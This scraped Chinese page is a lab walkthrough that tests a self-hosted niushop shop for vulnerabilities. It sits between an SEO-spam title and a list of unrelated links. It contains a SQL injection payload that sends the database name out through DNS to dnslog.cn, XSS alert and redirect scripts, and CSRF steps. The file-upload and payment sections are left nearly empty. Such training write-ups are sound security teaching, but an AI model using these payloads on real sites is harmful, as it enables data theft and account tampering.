当前位置: 首页 > news >正文

进网站后台显示空白千峰培训出来好就业吗

进网站后台显示空白,千峰培训出来好就业吗,云南文山邮编,道真住房和城乡建设局网站靶场搭建 将 niushop-master.zip 压缩包放到网站的根目录,解压后访问 浏览器访问 install.php ,根据提示安装即可 1.SQL注入漏洞 随便选择一种商品分类,发现有参数,测试注入 测试闭合发现页面报错有sql注入 应该是环境的问题&am…

靶场搭建

将 niushop-master.zip 压缩包放到网站的根目录,解压后访问

浏览器访问 install.php ,根据提示安装即可

1.SQL注入漏洞

随便选择一种商品分类,发现有参数,测试注入

测试闭合发现页面报错有sql注入

应该是环境的问题,但是这不影响我们判断存在sql注入

该网站还有一处sql注入漏洞,我们可以进入后台系统--设置--数据库管理--SQL执行与导入

输入查询语句,点击执行,成功执行,但是我们得不到具体信息,这时需要利用外带注入方法

外带原理:将dnslog平台中的特有字段payload带⼊⽬标发起dns请求,通过dns解析将请求后的关键信息组合新的三级域名带出,在dns服务器的dns⽇志中显示出来 DNSLog Platform

select load_file(concat('\\\\',(select database()),'.95xpzc.dnslog.cn\\abc'))

文件上传漏洞

1.首先写一个一句话木马

XSS漏洞

反射型xss漏洞

登录后台系统--设置--基础设置--商城第三方统计代码

在输入框中输入js弹窗代码,然后点击提交

<script>alert(1)</script>

返回前端页面,刷新,出现弹窗

后台系统还有一处反射型xss漏洞,点击网站--广告位--添加广告

<script>alert(1)</script>

返回前端刷新,点击该广告,页面会出现弹窗

存储型xss漏洞

后台系统还有一处,点击网站--广告位--添加广告

这里的 '链接地址' 可以尝试xss

在自己网站的根目录新建一个 2.html 文件,内容如下

<script>document.location="http://www.baidu.com"</script>

链接地址修改为www下的 2.html

返回前端,刷新页面,点击此广告,页面就会跳转到设置的界面

CSRF漏洞

注册一个普通用户,登录以后修改基本信息

使用bp抓取提交信息的请求包,鼠标右键--相关工具--生成CSRF-Poc--复制HTML

将复制的内容放到自己本地网站的根目录,浏览器访问

点击按钮,就会发现用户信息被修改,说明存在CSRF漏洞

支付漏洞

http://www.hrbkazy.com/news/7568.html

相关文章:

  • 邢台做网站推广的公司企业网站seo方案案例
  • 滕州建网站湖南网站建设推广
  • 阜宁县住房与城乡建设局网站南宁seo服务优化
  • 网站建设 inurl:.bbs建立网站需要什么
  • 做网站的每天打电话咋办饥饿营销的十大案例
  • 哪个网站可以做行测题目品牌营销推广方案
  • 求一个自己做的网站链接开个网站平台要多少钱
  • 纯静态网站做优化有什么影响小程序制作费用一览表
  • 南通做网站厉害的近期的时事热点或新闻事件
  • 如果评价网站做的好不好舆情报告范文
  • 江门seo网站排名谷歌优化怎么做
  • 东台网站建设深圳门户网站
  • 百度链接插件 wordpress推广关键词如何优化
  • 重庆定制网站开发价格找文网客服联系方式
  • 湖北网站建设哪家专业金戈枸橼酸西地那非片
  • 网站维护与优化教程seo关键词推广怎么做
  • 武汉网站建设 网站制作西安新站网站推广优化
  • 可信的大连网站建设北京seoqq群
  • 网站建设制作 企业站开发哪家好网络优化工程师有多累
  • 安徽网站设计与优化电话营销外包公司
  • 网站建设施工方案沈阳专业网站seo推广
  • 制定网站建设方案直通车怎么开
  • 昆明公司建设网站深圳小程序开发公司
  • wordpress 织梦转换windows优化大师收费吗
  • 做网站需要apache竞价托管资讯
  • 怎么自己编码做网站雅虎搜索引擎首页
  • 环保网站 中企动力建设市场营销的八个理论
  • 腾讯云 建网站模板网站建站公司
  • b2b网站建立长尾关键词挖掘网站
  • 天津网站建设 易尔通app如何推广